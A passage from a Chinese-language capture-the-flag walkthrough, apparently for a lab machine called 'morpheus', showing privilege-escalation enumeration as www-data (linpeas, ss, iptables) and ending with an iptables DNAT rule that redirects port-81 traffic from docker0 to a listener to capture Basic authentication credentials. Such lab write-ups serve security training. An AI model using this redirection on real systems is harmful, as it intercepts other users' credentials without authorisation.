(remote) www-data@morpheus:\/var\/tmp$ .\/linpeas.sh \nLinux Privesc Checklist: https:\/\/book.hacktricks.xyz\/linux-hardening\/linux-privilege-escalation-checklist\n LEGEND:\n  RED\/YELLOW: 95% a PE vector\n  RED: You should take a look to it\n  LightCyan: Users with console\n  Blue: Users without console & mounted devs\n  Green: Common things (users, groups, SUID\/SGID, mounts, .sh scripts, cronjobs) \n  LightMagenta: Your username\n\n Starting linpeas. Caching Writable Folders...\n.\/linpeas.sh: 292: search_for_regex: not found\n\n.\/linpeas.sh: 296: Syntax error: "else" unexpected\n(remote) www-data@morpheus:\/var\/tmp$ \/tmp\/lpspy64 \nSegmentation fault<\/code><\/pre>\n
\u624b\u52a8\u63a2\u6d4b\uff1a<\/p>\n
(remote) www-data@morpheus:\/var\/tmp$ ss -atlup\nNetid         State          Recv-Q         Send-Q                 Local Address:Port                    Peer Address:Port         Process         \nudp           UNCONN         0              0                          127.0.0.1:323                          0.0.0.0:*                            \nudp           UNCONN         0              0                            0.0.0.0:bootpc                       0.0.0.0:*                            \nudp           UNCONN         0              0                              [::1]:323                             [::]:*                            \ntcp           LISTEN         0              4096                       127.0.0.1:32939                        0.0.0.0:*                            \ntcp           LISTEN         0              511                          0.0.0.0:81                           0.0.0.0:*                            \ntcp           LISTEN         0              128                          0.0.0.0:ssh                          0.0.0.0:*                            \ntcp           LISTEN         0              511                                *:http                               *:*                            \ntcp           LISTEN         0              511                             [::]:81                              [::]:*                            \ntcp           LISTEN         0              128                             [::]:ssh                             [::]:*                            \n(remote) www-data@morpheus:\/var\/tmp$ curl -is 0.0.0.0:81\nHTTP\/1.1 401 Unauthorized\nServer: nginx\/1.18.0\nDate: Mon, 08 Jul 2024 10:22:35 GMT\nContent-Type: text\/html\nContent-Length: 179\nConnection: keep-alive\nWWW-Authenticate: Basic realm="Meeting Place"\n\n<html>\n<head><title>401 Authorization Required<\/title><\/head>\n<body>\n<center><h1>401 Authorization Required<\/h1><\/center>\n<hr><center>nginx\/1.18.0<\/center>\n<\/body>\n<\/html><\/code><\/pre>\n
\u6d41\u91cf\u8f6c\u53d1\u83b7\u53d6basic\u8ba4\u8bc1<\/h3>\n
\u53d1\u73b0\u679c\u7136\u9700\u8981\u8fdb\u884c\u8ba4\u8bc1\u3002\u3002\u3002\u3002\u3002\u6211\u8fd9\u91cc\u6ca1\u601d\u8def\u4e86\uff0c\u770b\u4e86\u4e00\u4e0b\u7fa4\u4e3b\u89c6\u9891\uff0c\u53d1\u73b0\u548c\u4e00\u4e2a\u9632\u706b\u5899\u6d41\u91cf\u8f6c\u53d1\u6709\u5173\uff1a<\/p>\n
(remote) www-data@morpheus:\/$ iptables -L\nChain INPUT (policy ACCEPT)\ntarget     prot opt source               destination         \n\nChain FORWARD (policy DROP)\ntarget     prot opt source               destination         \nDOCKER-USER  all  --  anywhere             anywhere            \nDOCKER-ISOLATION-STAGE-1  all  --  anywhere             anywhere            \nACCEPT     all  --  anywhere             anywhere             ctstate RELATED,ESTABLISHED\nDOCKER     all  --  anywhere             anywhere            \nACCEPT     all  --  anywhere             anywhere            \nACCEPT     all  --  anywhere             anywhere            \n\nChain OUTPUT (policy ACCEPT)\ntarget     prot opt source               destination         \n\nChain DOCKER (1 references)\ntarget     prot opt source               destination         \n\nChain DOCKER-ISOLATION-STAGE-1 (1 references)\ntarget     prot opt source               destination         \nDOCKER-ISOLATION-STAGE-2  all  --  anywhere             anywhere            \nRETURN     all  --  anywhere             anywhere            \n\nChain DOCKER-ISOLATION-STAGE-2 (1 references)\ntarget     prot opt source               destination         \nDROP       all  --  anywhere             anywhere            \nRETURN     all  --  anywhere             anywhere            \n\nChain DOCKER-USER (1 references)\ntarget     prot opt source               destination         \nRETURN     all  --  anywhere             anywhere  \n(remote) www-data@morpheus:\/$ ls -la \/usr\/sbin\/iptables\nlrwxrwxrwx 1 root root 26 Oct 11  2021 \/usr\/sbin\/iptables -> \/etc\/alternatives\/iptables<\/code><\/pre>\n
\u800c\u4e14\u9614\u4ee5\u4fee\u6539\uff0c\u6240\u4ee5\u91c7\u7528\u4fee\u6539\u8def\u7531\u8fdb\u884c\u8f6c\u53d1\uff0c\u666e\u901a\u7528\u6237\u4e00\u822c\u662f\u65e0\u6cd5\u4fee\u6539\u8fd9\u79cd\u6587\u4ef6\u7684\uff1a<\/p>\n
iptables -A PREROUTING -t nat -i docker0 -p tcp --dport 81 -j DNAT --to 172.17.0.1:1234<\/code><\/pre>\n